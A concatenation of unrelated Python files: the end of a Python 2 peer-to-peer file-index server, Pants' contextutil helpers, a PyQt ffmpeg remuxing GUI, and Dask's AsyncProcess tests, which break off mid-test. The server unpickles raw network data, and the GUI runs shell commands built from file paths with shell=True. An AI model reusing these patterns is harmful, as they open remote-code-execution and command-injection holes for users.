fileCache[x[0]].append(myIPAddr)
elif(x[5] == "delete"):
print "deleting files -->"+ myIPAddr+"-->filename-->"+ x[0]
del(childNodes[myIPAddr].fileMap[x[0]])
fileCache[x[0]].remove(myIPAddr)
if(len(fileCache[x[0]])==0):
del(fileCache[x[0]])
conn.close()
tcpsock.close()
# Whenever our fileCache is updated send the updated file meta information to
# other supernodes.
def sendUpdates(data):
print("___--inside send updates _______")
for x in superNodeList:
print("_____superNode fella->"+str(x)+"<_____")
sendObj(PORT_updateSuperNode, x, data)
# -------------------------end super node comm----------------------------
class Node:
def __init__(self, IPAddr, liveStatus) :
self.IPAddr = IPAddr
self.liveStatus = liveStatus
self.fileMap = {}
def __eq__(self, other):
if not isinstance(other, Node):
# don't attempt to compare against unrelated types
return NotImplemented
return self.IPAddr == other.IPAddr
class File:
def __init__(self, name, h1, h2, h3, h4):
self.name = name
self.h1 = h1
self.h2 = h2
self.h3 = h3
self.h4 = h4
# recv an object via TCP socket
def recvObj(port, tout = 4):
TCP_IP = myIPAddr
TCP_PORT = port
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(tout)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(5096)
data = pickle.loads(msg)
tcpsock.close()
return data
except socket.timeout as e:
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
tcpsock.close()
# send an object from TCP sockets
def sendObj(port, IPAddr, obj):
TCP_IP = str(IPAddr)
TCP_PORT = port
BUFFER_SIZE = 5096
#convert object to serial stream
msg = pickle.dumps(obj)
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
p.connect((str(TCP_IP), TCP_PORT))
p.send(msg)
p.close()
except socket.error , exc:
print "Error Caught : ",exc
# thread running continuously to cater to the requests made by the clients
# port 9090
def reqHandler():
sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sNode.bind(("", 9090))
while True:
# continuously listen for broadcast msgs
data, addr = sNode.recvfrom(5096)
if data == "showFiles" :
print "Inside reqhandler showfile :",addr[0]
showFile(addr[0])
elif data == "findFile":
print "Inside reqhandler Findfile :",addr[0]
findFile(addr[0])
# returns the list of all filenames from alive nodes.
# PORT 9001
def showFile(IPAddr):
result =[]
for x in fileCache:
result.append(x)
sendObj(9001, IPAddr, result)
# gets filename and returns list of IP
# PORT 9002, 9003
def findFile(IPAddr):
filename = recvObj(9002)
print "Filename : ",filename
sendObj(9003, IPAddr, fileCache[filename])
def handleFiles(IPAddr):
print ("_______handle files _________"+ str(IPAddr)+"_______________")
TCP_IP = myIPAddr
TCP_PORT = 44445
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((TCP_IP, TCP_PORT))
tcpsock.settimeout(10)
try:
tcpsock.listen(5)
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(5096)
# print ("____________________")
print msg
# print ("____________________")
data = pickle.loads(msg)
#push file updates to all the supernodes
sendUpdates(data)
print "----------"
for x in data:
print x
if(x[5] == "add"):
print "adding files -->"+ IPAddr +"-->fileName-->"+ x[0]
childNodes[IPAddr].fileMap[x[0]] = File(x[0], x[1], x[2], x[3], x[4])
print("_____________debugging ki ma_________________________")
print("filecahce->", fileCache)
print("x[0]", x[0])
print("IPADDR->", IPAddr)
print(fileCache[x[0]])
print("_______________________________________________________")
fileCache[x[0]].append(IPAddr)
elif(x[5] == "delete"):
print "deleting files -->"+ IPAddr+"-->filename-->"+ x[0]
del(childNodes[IPAddr].fileMap[x[0]])
fileCache[x[0]].remove(IPAddr)
if(len(fileCache[x[0]])==0):
del(fileCache[x[0]])
print "----------"
x = childNodes[IPAddr]
for y in x.fileMap:
print(x.fileMap[y].name)
tcpsock.close()
print "Exiting Try Staement in Handle Files"
return
except socket.error ,exc:
print "Error in HandleFile : ",exc
print "files addition socket timeout : " + TCP_IP
tcpsock.close()
return
print "Exiting Handle Files"
def assignSuperNode():
# accept requests to become superNode
sNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sNode.bind(("", 37020))
while True:
# continuously listen for broadcast msgs
data, addr = sNode.recvfrom(5096)
if data != '':
# print("____________"+data+"___________")
# print("____________"+myIPAddr+"___________")
# print("____________"+addr[0]+"___________")
sNode.sendto(myIPAddr, addr)
print "Receive New Connection : ",addr[0]
## ACK Listening Start
tempNode = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
tempNode.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
tempNode.bind((myIPAddr, 8090))
tempNode.settimeout(5)
try:
data1, addr1 = tempNode.recvfrom(5096)
tempNode.close()
print "Data :",data1," Message :",addr[0]
if data1 == "ACK":
if childNodes.get(addr[0]) is not None:
childNodes[addr[0]].liveStatus = True
print('----------dead to alive-------')
#TODO
handleFiles(addr[0])
else:
childNodes[addr[0]]=(Node(addr[0], True))
print('------adding new node ----------')
#TODO
handleFiles(addr[0])
except socket.timeout as e:
print "Error caught during super Node Assignment :",e
## ACK Listening END
def heartBeat():
print 'Inside HeartBeat'
isCheck = False
while True:
# TCP_IP = "10.196.700.181"
for x in list(childNodes):
child = childNodes[x]
if(child.liveStatus):
print "Child IP : "+child.IPAddr
TCP_IP = child.IPAddr
TCP_PORT = 12121
BUFFER_SIZE = 5096
tcpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
tcpsock.bind((myIPAddr, TCP_PORT))
tcpsock.settimeout(10)
isCheck = True
try:
tcpsock.listen(5)
print "Checking for Node Alive "+ TCP_IP
(conn, (ip, port)) = tcpsock.accept()
msg = conn.recv(5096)
except socket.timeout as e:
# child.liveStatus = False
# print "Node is Dead AF : " + TCP_IP
tcpsock.close()
continue
print "Node is Alive :) " + TCP_IP
tcpsock.close()
if isCheck:
time.sleep(300)
isCheck = False
# def SupernodeToSupernode():
# supernodeIPList = ['10.196.7.181']
if __name__ == "__main__":
myIP()
threads = []
# print ID of current process
# print("ID of process running main program: {}".format(os.getpid()))
# print name of main thread
# print("Main thread name: {}".format(threading.main_thread().name))
setSuper = threading.Thread(target=setSuperNodes, name='setSuper')
# Run forever to Assign Super node to Client
t1 = threading.Thread(target=assignSuperNode, name='t1')
# Run forever to check File Server Live Status (Alive/Dead)
hbt = threading.Thread(target = heartBeat, name = 'heartBeat')
reqH = threading.Thread(target = reqHandler, name = 'reqH')
getU = threading.Thread(target = getUpdates, name = 'getU')
threads.append(setSuper)
threads.append(t1)
threads.append(hbt)
threads.append(reqH)
threads.append(getU)
# starting threads
setSuper.start()
getU.start()
t1.start()
hbt.start()
# sts.start()
reqH.start()
# wait until all threads finish
getU.join()
setSuper.join()
t1.join()
hbt.join()
reqH.join()
|
contextutil.py | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import shutil
import sys
import tempfile
import termios
import threading
import zipfile
from contextlib import contextmanager
from pathlib import Path
from queue import Queue
from socketserver import TCPServer
from typing import IO, Any, Callable, Iterator, Mapping, Optional, Tuple, Type, Union
from colors import green
from pants.util.dirutil import safe_delete
class InvalidZipPath(ValueError):
"""Indicates a bad zip file path."""
@contextmanager
def environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Update the environment to the supplied values, for example:
with environment_as(PYTHONPATH='foo:bar:baz',
PYTHON='/usr/bin/python2.7'):
subprocess.Popen(foo).wait()
"""
new_environment = kwargs
old_environment = {}
def setenv(key: str, val: Optional[str]) -> None:
if val is not None:
os.environ[key] = val
else:
if key in os.environ:
del os.environ[key]
for key, val in new_environment.items():
old_environment[key] = os.environ.get(key)
setenv(key, val)
try:
yield
finally:
for key, val in old_environment.items():
setenv(key, val)
def _purge_env() -> None:
# N.B. Without the use of `del` here (which calls `os.unsetenv` under the hood), subprocess
# invokes or other things that may access the environment at the C level may not see the
# correct env vars (i.e. we can't just replace os.environ with an empty dict).
# See https://docs.python.org/3/library/os.html#os.unsetenv for more info.
#
# Wraps iterable in list() to make a copy and avoid issues with deleting while iterating.
for k in list(os.environ.keys()):
del os.environ[k]
def _restore_env(env: Mapping[str, str]) -> None:
for k, v in env.items():
os.environ[k] = v
@contextmanager
def hermetic_environment_as(**kwargs: Optional[str]) -> Iterator[None]:
"""Set the environment to the supplied values from an empty state."""
old_environment = os.environ.copy()
_purge_env()
try:
with environment_as(**kwargs):
yield
finally:
_purge_env()
_restore_env(old_environment)
@contextmanager
def argv_as(args: Tuple[str, ...]) -> Iterator[None]:
"""Temporarily set `sys.argv` to the supplied value."""
old_args = sys.argv
try:
sys.argv = list(args)
yield
finally:
sys.argv = old_args
@contextmanager
def _stdio_stream_as(src_fd: int, dst_fd: int, dst_sys_attribute: str, mode: str) -> Iterator[None]:
"""Replace the given dst_fd and attribute on `sys` with an open handle to the given src_fd."""
if src_fd == -1:
src = open("/dev/null", mode)
src_fd = src.fileno()
# Capture the python and os level file handles.
old_dst = getattr(sys, dst_sys_attribute)
old_dst_fd = os.dup(dst_fd)
if src_fd != dst_fd:
os.dup2(src_fd, dst_fd)
# Open up a new file handle to temporarily replace the python-level io object, then yield.
new_dst = os.fdopen(dst_fd, mode)
is_atty = new_dst.isatty()
setattr(sys, dst_sys_attribute, new_dst)
try:
yield
finally:
try:
if is_atty:
termios.tcdrain(dst_fd)
else:
new_dst.flush()
new_dst.close()
except BaseException:
pass
# Restore the python and os level file handles.
os.dup2(old_dst_fd, dst_fd)
setattr(sys, dst_sys_attribute, old_dst)
@contextmanager
def stdio_as(stdout_fd: int, stderr_fd: int, stdin_fd: int) -> Iterator[None]:
"""Redirect sys.{stdout, stderr, stdin} to alternate file descriptors.
As a special case, if a given destination fd is `-1`, we will replace it with an open file handle
to `/dev/null`.
NB: If the filehandles for sys.{stdout, stderr, stdin} have previously been closed, it's
possible that the OS has repurposed fds `0, 1, 2` to represent other files or sockets. It's
impossible for this method to locate all python objects which refer to those fds, so it's up
to the caller to guarantee that `0, 1, 2` are safe to replace.
The streams expect unicode. To write and read bytes, access their buffer, e.g. `stdin.buffer.read()`.
"""
with _stdio_stream_as(stdin_fd, 0, "stdin", "r"), _stdio_stream_as(
stdout_fd, 1, "stdout", "w"
), _stdio_stream_as(stderr_fd, 2, "stderr", "w"):
yield
@contextmanager
def temporary_dir(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
prefix: Optional[str] = tempfile.template,
) -> Iterator[str]:
"""A with-context that creates a temporary directory.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary directory.
:param cleanup: Whether or not to clean up the temporary directory.
:param permissions: If provided, sets the directory permissions to this mode.
"""
path = tempfile.mkdtemp(dir=root_dir, suffix=suffix, prefix=prefix)
try:
if permissions is not None:
os.chmod(path, permissions)
yield path
finally:
if cleanup:
shutil.rmtree(path, ignore_errors=True)
@contextmanager
def temporary_file_path(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
) -> Iterator[str]:
"""A with-context that creates a temporary file and returns its path.
:API: public
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
"""
with temporary_file(root_dir, cleanup=cleanup, suffix=suffix, permissions=permissions) as fd:
fd.close()
yield fd.name
@contextmanager
def temporary_file(
root_dir: Optional[str] = None,
cleanup: bool = True,
suffix: Optional[str] = None,
permissions: Optional[int] = None,
binary_mode: bool = True,
) -> Iterator[IO]:
"""A with-context that creates a temporary file and returns a writeable file descriptor to it.
You may specify the following keyword args:
:param root_dir: The parent directory to create the temporary file.
:param cleanup: Whether or not to clean up the temporary file.
:param suffix: If suffix is specified, the file name will end with that suffix.
Otherwise there will be no suffix.
mkstemp() does not put a dot between the file name and the suffix;
if you need one, put it at the beginning of suffix.
See :py:class:`tempfile.NamedTemporaryFile`.
:param permissions: If provided, sets the file to use these permissions.
:param binary_mode: Whether file opens in binary or text mode.
"""
mode = "w+b" if binary_mode else "w+" # tempfile's default is 'w+b'
with tempfile.NamedTemporaryFile(suffix=suffix, dir=root_dir, delete=False, mode=mode) as fd:
try:
if permissions is not None:
os.chmod(fd.name, permissions)
yield fd
finally:
if cleanup:
safe_delete(fd.name)
@contextmanager
def overwrite_file_content(
file_path: Union[str, Path],
temporary_content: Optional[Union[bytes, str, Callable[[bytes], bytes]]] = None,
) -> Iterator[None]:
"""A helper that resets a file after the method runs.
It will read a file, save the content, maybe write temporary_content to it, yield, then
write the original content to the file.
:param file_path: Absolute path to the file to be reset after the method runs.
:param temporary_content: Content to write to the file, or a function from current content
to new temporary content.
"""
file_path = Path(file_path)
original_content = file_path.read_bytes()
try:
if temporary_content is not None:
if callable(temporary_content):
content = temporary_content(original_content)
elif isinstance(temporary_content, bytes):
content = temporary_content
else:
content = temporary_content.encode()
file_path.write_bytes(content)
yield
finally:
file_path.write_bytes(original_content)
@contextmanager
def pushd(directory: str) -> Iterator[str]:
"""A with-context that encapsulates pushd/popd."""
cwd = os.getcwd()
os.chdir(directory)
try:
yield directory
finally:
os.chdir(cwd)
@contextmanager
def open_zip(path_or_file: Union[str, Any], *args, **kwargs) -> Iterator[zipfile.ZipFile]:
"""A with-context for zip files.
Passes through *args and **kwargs to zipfile.ZipFile.
:API: public
:param path_or_file: Full path to zip file.
:param args: Any extra args accepted by `zipfile.ZipFile`.
:param kwargs: Any extra keyword args accepted by `zipfile.ZipFile`.
:raises: `InvalidZipPath` if path_or_file is invalid.
:raises: `zipfile.BadZipfile` if zipfile.ZipFile cannot open a zip at path_or_file.
"""
if not path_or_file:
raise InvalidZipPath(f"Invalid zip location: {path_or_file}")
if "allowZip64" not in kwargs:
kwargs["allowZip64"] = True
try:
zf = zipfile.ZipFile(path_or_file, *args, **kwargs)
except zipfile.BadZipfile as bze:
# Use the realpath in order to follow symlinks back to the problem source file.
raise zipfile.BadZipfile(f"Bad Zipfile {os.path.realpath(path_or_file)}: {bze}")
try:
yield zf
finally:
zf.close()
@contextmanager
def maybe_profiled(profile_path: Optional[str]) -> Iterator[None]:
"""A profiling context manager.
:param profile_path: The path to write profile information to. If `None`, this will no-op.
"""
if not profile_path:
yield
return
import cProfile
profiler = cProfile.Profile()
try:
profiler.enable()
yield
finally:
profiler.disable()
profiler.dump_stats(profile_path)
view_cmd = green(
"gprof2dot -f pstats {path} | dot -Tpng -o {path}.png && open {path}.png".format(
path=profile_path
)
)
logging.getLogger().info(
f"Dumped profile data to: {profile_path}\nUse e.g. {view_cmd} to render and view."
)
@contextmanager
def http_server(handler_class: Type) -> Iterator[int]:
def serve(port_queue: "Queue[int]", shutdown_queue: "Queue[bool]") -> None:
httpd = TCPServer(("", 0), handler_class)
httpd.timeout = 0.1
port_queue.put(httpd.server_address[1])
while shutdown_queue.empty():
httpd.handle_request()
port_queue: "Queue[int]" = Queue()
shutdown_queue: "Queue[bool]" = Queue()
t = threading.Thread(target=lambda: serve(port_queue, shutdown_queue))
t.daemon = True
t.start()
try:
yield port_queue.get(block=True)
finally:
shutdown_queue.put(True)
t.join()
|
juicer.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# ffmpeg -i an.mp4 -i vn.mp4 -map_metadata 0 -c copy map.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -c copy D:\va.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -vn -c copy D:\vn.mp4
# ffmpeg -i "E:\TV\美国\看见 See.S01.HDR.2160p.WEB.h265-NiXON[rartv]\see.s01e01.hdr.2160p.web.h265-nixon.mkv" -an -c copy D:\an.mp4
# pyinstaller -w -c -D --icon=juicer_icon.ico juicer.py
#
import os,sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
import qdarkstyle
from pathlib import Path
import threading
import subprocess
import time
class Juicer(QWidget):
def __init__(self):
super().__init__()
self.initUI()
self.show()
def initUI(self):
#获取显示器分辨率大小
self.desktop = QApplication.primaryScreen()
self.screenRect = self.desktop.availableGeometry()
self.height = self.screenRect.height()
self.width = self.screenRect.width()
#设置窗口大小
self.resize(int(self.width*0.5), int(self.height*0.5))
# 设置窗口标题
self.setWindowTitle(' Juicer 提取器')
self.setWindowIcon(QIcon('img/juicer_icon.ico'))
# 修改成网格布局
grid = QGridLayout()
self.pathLine = QTextEdit(readOnly=True)
self.pathLine.setPlaceholderText("视频源文件")
grid.addWidget(self.pathLine, 1, 0, 1, 1)
self.selectButton = QPushButton("选择文件", self)
self.selectButton.setToolTip('选择MKV视频源文件')
self.selectButton.clicked.connect(self.openFileNamesDialog)
self.selectButton.setFixedWidth(160)
grid.addWidget(self.selectButton, 1, 1)
self.dirLine = QLineEdit(readOnly=True)
self.dirLine.setPlaceholderText("输出文件夹")
grid.addWidget(self.dirLine, 2, 0)
outdirButton = QPushButton("输出目录", self)
outdirButton.clicked.connect(self.saveFileDialog)
outdirButton.setToolTip('存储视频的文件夹')
grid.addWidget(outdirButton, 2, 1)
self.extrLine = QTextEdit(readOnly=True)
self.extrLine.setPlaceholderText("等待执行")
grid.addWidget(self.extrLine, 3, 0, 1, 1)
self.extractorButton = QPushButton("提取", self)
self.extractorButton.clicked.connect(self.extractor)
grid.addWidget(self.extractorButton, 4, 1)
self.suffix = '.mp4'
self.mux = ''
self.cmdsuffixCombo = QComboBox(self)
self.cmdsuffixCombo.setFixedWidth(100)
self.cmdsuffixCombo.addItem("MP4")
self.cmdsuffixCombo.addItem("MOV")
self.cmdsuffixCombo.addItem("TrueHD")
self.cmdsuffixCombo.activated[str].connect(self.onChangedCmdsuffix)
grid.addWidget(self.cmdsuffixCombo, 4, 0,
alignment=Qt.AlignRight)
# nullLabel = QLabel('')
# grid.addWidget(nullLabel, 12, 0)
self.setLayout(grid)
def onChangedCmdsuffix(self, cmdsuffix):
if cmdsuffix == "MP4":
self.suffix = '.mp4'
print ('mp4')
if cmdsuffix == "MOV":
self.suffix = '.mov'
if cmdsuffix == "TrueHD":
self.mux = ' -strict experimental '
def suffixFilename(self, state):
if state == Qt.Checked:
# print('Checked')
self.suffix = '.mov'
if state == Qt.Unchecked:
# print('Unchecked')
self.suffix = '.mp4'
def muxCmd(self, state2):
if state2 == Qt.Checked:
# print('Checked')
# self.mux = ' -strict -2 '
self.mux = ' -strict experimental '
if state2 == Qt.Unchecked:
# print('Unchecked')
self.mux = ''
def openFileNamesDialog(self):
options = QFileDialog.Options()
# options.setFixedSize(self.width*0.3, self.height*0.5)
options |= QFileDialog.DontUseNativeDialog
self.inputFiles, _ = QFileDialog.getOpenFileNames(self,"QFileDialog.getOpenFileNames()", "","视频文件 (*.mkv *.mp4)", options=options)
if self.inputFiles:
# print(self.inputFiles)
self.filelist =",".join(self.inputFiles)
self.pathLine.setPlainText(str(self.filelist))
else:
pass
# print(str(self.filelist[0]))
# print (type(inputFiles))
def saveFileDialog(self):
self.outputFileDir = QFileDialog.getExistingDirectory(self,"选择目录","")
if self.outputFileDir:
# print(self.outputFileDir)
self.dirLine.setText(str(self.outputFileDir))
else:
pass
def extractor(self):
try:
for inputListFile in self.inputFiles:
self.inputFileName = Path(inputListFile).name
self.inputFileSuffix = Path(inputListFile).suffix
inputFilePath = str(inputListFile).replace('\\','/')
self.outputFilePath = str(self.outputFileDir) + '/' + str(self.inputFileName)
outputFilePathSuffix = str(self.outputFilePath).replace(self.inputFileSuffix,'')
self.extractorButton.setDisabled(True)
satusShowLable = self.outputFilePath + ' 正在执行封装工作,请稍等…… '
self.extrLine.append(satusShowLable)
ffmpeg = os.getcwd().replace('\\','/') + '/bin/ffmpeg.exe'
ffmpegcmd = (ffmpeg + " -y -i " + '"' + inputFilePath +'"' + " -c copy " + self.mux + '"' + outputFilePathSuffix + self.suffix + '"')
thread = threading.Thread(
target=self.extractorThread, args=(ffmpegcmd))
thread.start()
# thread.joint()
QApplication.processEvents()
except AttributeError as err:
self.extrLine.append(' 请检查,文件路径 ')
# self.extrLine.setStyleSheet('color: yellow')
pass
def extractorThread(self, ffmpegcmd):
ffmpegcmdrun = subprocess.Popen(
ffmpegcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# if:
stdout, stderr = ffmpegcmdrun.communicate()
# print('错哪里了')
# finalShowText = outputFilePathSuffix + self.suffix + ' 提取完成 '
# self.extrLine.append(finalShowText)
# self.extractorButton.setEnabled(True)
if __name__ == '__main__':
app = QApplication(sys.argv)
app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
# app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api='pyside2'))
# QFontDatabase.addApplicationFont('Font\SourceHanSansSC-Normal.otf')
# app.setFont('Font\SourceHanSansSC-Normal.otf')
ex = Juicer()
sys.exit(app.exec_())
|
test_asyncprocess.py | from __future__ import print_function, division, absolute_import
from datetime import timedelta
import gc
import os
import signal
import sys
import threading
from time import sleep
import weakref
import pytest
from tornado import gen
from tornado.locks import Event
from distributed.metrics import time
from distributed.process import AsyncProcess
from distributed.utils import mp_context
from distributed.utils_test import gen_test, pristine_loop, nodebug
def feed(in_q, out_q):
obj = in_q.get(timeout=5)
out_q.put(obj)
def exit(q):
sys.exit(q.get())
def exit_now(rc=0):
sys.exit(rc)
def exit_with_signal(signum):
signal.signal(signal.SIGINT, signal.SIG_DFL)
while True:
os.kill(os.getpid(), signum)
sleep(0.01)
def wait():
while True:
sleep(0.01)
def threads_info(q):
q.put(len(threading.enumerate()))
q.put(threading.current_thread().name)
@nodebug
@gen_test()
def test_simple():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
proc = AsyncProcess(target=feed, args=(to_child, from_child))
assert not proc.is_alive()
assert proc.pid is None
assert proc.exitcode is None
assert not proc.daemon
proc.daemon = True
assert proc.daemon
wr1 = weakref.ref(proc)
wr2 = weakref.ref(proc._process)
# join() before start()
with pytest.raises(AssertionError):
yield proc.join()
yield proc.start()
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
t1 = time()
yield proc.join(timeout=0.02)
dt = time() - t1
assert 0.2 >= dt >= 0.01
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
# setting daemon attribute after start()
with pytest.raises(AssertionError):
proc.daemon = False
to_child.put(5)
assert from_child.get() == 5
# child should be stopping now
t1 = time()
yield proc.join(timeout=10)
dt = time() - t1
assert dt <= 1.0
assert not proc.is_alive()
assert proc.pid is not None
assert proc.exitcode == 0
# join() again
t1 = time()
yield proc.join()
dt = time() - t1
assert dt <= 0.6
del proc
gc.collect()
start = time()
while wr1() is not None and time() < start + 1:
# Perhaps the GIL switched before _watch_process() exit,
# help it a little
sleep(0.001)
gc.collect()
if wr1() is not None:
# Help diagnosing
from types import FrameType
p = wr1()
if p is not None:
rc = sys.getrefcount(p)
refs = gc.get_referrers(p)
del p
print("refs to proc:", rc, refs)
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print("frames #%d:" % i,
f.f_code.co_name, f.f_code.co_filename, sorted(f.f_locals))
pytest.fail("AsyncProcess should have been destroyed")
t1 = time()
while wr2() is not None:
yield gen.sleep(0.01)
gc.collect()
dt = time() - t1
assert dt < 2.0
@gen_test()
def test_exitcode():
q = mp_context.Queue()
proc = AsyncProcess(target=exit, kwargs={'q': q})
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
yield proc.start()
assert proc.is_alive()
assert proc.exitcode is None
q.put(5)
yield proc.join(timeout=3.0)
assert not proc.is_alive()
assert proc.exitcode == 5
@pytest.mark.skipif(os.name == 'nt', reason="POSIX only")
@gen_test()
def test_signal():
proc = AsyncProcess(target=exit_with_signal, args=(signal.SIGINT,))
proc.daemon = True
assert not proc.is_alive()
assert proc.exitcode is None
yield proc.start()
yield proc.join(timeout=3.0)
assert not proc.is_alive()
# Can be 255 with forkserver, see https://bugs.python.org/issue30589
assert proc.exitcode in (-signal.SIGINT, 255)
proc = AsyncProcess(target=wait)
yield proc.start()
os.kill(proc.pid, signal.SIGTERM)
yield proc.join(timeout=3.0)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
def test_terminate():
proc = AsyncProcess(target=wait)
proc.daemon = True
yield proc.start()
yield proc.terminate()
yield proc.join(timeout=3.0)
assert not proc.is_alive()
assert proc.exitcode in (-signal.SIGTERM, 255)
@gen_test()
def test_close():
proc = AsyncProcess(target=exit_now)
proc.close()
with pytest.raises(ValueError):
yield proc.start()
proc = AsyncProcess(target=exit_now)
yield proc.start()
proc.close()
with pytest.raises(ValueError):
yield proc.terminate()
proc = AsyncProcess(target=exit_now)
yield proc.start()
yield proc.join()
proc.close()
with pytest.raises(ValueError):
yield proc.join()
proc.close()
@gen_test()
def test_exit_callback():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
evt = Event()
@gen.coroutine
def on_stop(_proc):
assert _proc is proc
yield gen.moment
evt.set()
# Normal process exit
proc = AsyncProcess(target=feed, args=(to_child, from_child))
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
yield proc.start()
yield gen.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
to_child.put(None)
yield evt.wait(timedelta(seconds=3))
assert evt.is_set()
assert not proc.is_alive()
# Process terminated
proc = AsyncProcess(target=wait)
evt.clear()
proc.set_exit_callback(on_stop)
proc.daemon = True
yield proc.start()
yield gen.sleep(0.05)
assert proc.is_alive()
assert not evt.is_set()
yield proc.terminate()
yield evt.wait(timedelta(seconds=3))
assert evt.is_set()
@gen_test()
def test_child_main_thread():
"""
The main thread in the child should be called "MainThread".
"""
q = mp_context.Queue()
proc = AsyncProcess(target=threads_info, args=(q,))
yield proc.start()
yield proc.join()
n_threads = q.get()
main_name = q.get()
assert n_threads == 2
assert main_name == "MainThread"
q.close()
q._reader.close()
q._writer.close()
@pytest.mark.skipif(sys.platform.startswith('win'),
reason="num_fds not supported on windows")
@gen_test()
def test_num_fds():
psutil = pytest.importorskip('psutil')
# Warm up
proc = AsyncProcess(target=exit_now)
proc.daemon = True
yield proc.start()
yield proc.join()
p = psutil.Process()
before = p.num_fds()
proc = AsyncProcess(target=exit_now)
proc.daemon = True
yield proc.start()
yield proc.join()
assert not proc.is_alive()
assert proc.exitcode == 0
start = time()
while p.num_fds() > before:
yield gen.sleep(0.1)
print("fds:", before, p.num_fds())
assert time() < start + 10
@gen_test()
def test_terminate_after_stop():
proc = AsyncProcess(target=sleep, args=(0,))
yield proc.start()
yield gen.sleep(0.1)
yield proc.terminate()
def _worker_process(worker_ready, child_pipe):
# child_pipe is the write-side of the children_alive pipe held by the
# test process. When this _worker_process exits, this file descriptor should
# have no references remaining anywhere and be closed by the kernel. The
# test will therefore be able to tell that this process has exited by
# reading children_alive.
# Signal to parent process that this process has started and made it this
# far. This should cause the parent to exit rapidly after this statement.
worker_ready.set()
# The parent exiting should cause this process to os._exit from a monitor
# thread. This sleep should never return.
shorter_timeout = 2.5 # timeout shorter than that in the spawning test.
sleep(shorter_timeout)
# Unreachable if functioning correctly.
child_pipe.send("child should have exited by now")
def _parent_process(child_pipe):
""" Simulate starting an AsyncProcess and then dying.
The child_alive pipe is held open for as long as the child is alive, and can
be used to determine if it exited correctly. """
def parent_process_coroutine():
worker_ready = mp_context.Event()
worker = AsyncProcess(target=_worker_process,
args=(worker_ready, child_pipe))
yield worker.start()
# Wait for the child process to have started.
worker_ready.wait()
# Exit immediately, without doing any process teardown (including atexit
# and 'finally:' blocks) as if by SIGKILL. This should cause
# worker_process to also exit.
os._exit(255)
with pristine_loop() as loop:
try:
loop.run_sync(gen.coroutine(parent_process_coroutine), timeout=10)
finally:
loop.stop()
raise RuntimeError("this should be unreachable due to os._exit")
def test_asyncprocess_child_teardown_on_parent_exit():
""" Check that a child process started by AsyncProcess exits if its parent
exits.
The motivation is to ensure that if an AsyncProcess is created and the
creator process dies unexpectedly (e.g, via Out-of-memory SIGKILL), the
child process and resources held by it should not be leaked.
The child should monitor its parent and exit promptly if the parent exits.
[test process] -> [parent using AsyncProcess (dies)] -> [worker process]
\ /
\________ <-- child_pipe <-- ________/
"""
# When child_pipe is closed, the children_alive pipe unblocks.
children_alive, child_pipe = mp_context.Pipe(duplex=False)
try:
parent = mp_context.Process(target=_parent_process, args=(child_pipe,))
parent.start()
# Close our reference to child_pipe so that the child has the only one.
child_pipe.close()
# Wait for the parent to exit. By the time join returns, the child
# process is orphaned, and should be in the process of exiting by
# itself.
parent.join()
# By the time we reach here,the parent has exited. The parent only exits
# when the child is ready to enter the sleep, so all of the slow things
# (process startup, etc) should have happened by now, even on a busy
# system. A short timeout should therefore be appropriate.
short_timeout = 5.
# Poll is used to allow other tests to proceed after this one in case of
# test failure.
try:
readable = children_alive.poll(short_timeout)
except EnvironmentError:
# Windows can raise BrokenPipeError. EnvironmentError is caught for
# Python2/3 portability.
assert sys.platform.startswith('win'), "should only raise on windows"
# Broken pipe implies closed, which is readable.
readable = True
# If this assert fires, then something went wrong. Either the child
# should write into the pipe, or it should exit and the pipe should be
# closed (which makes it become readable).
assert readable
try:
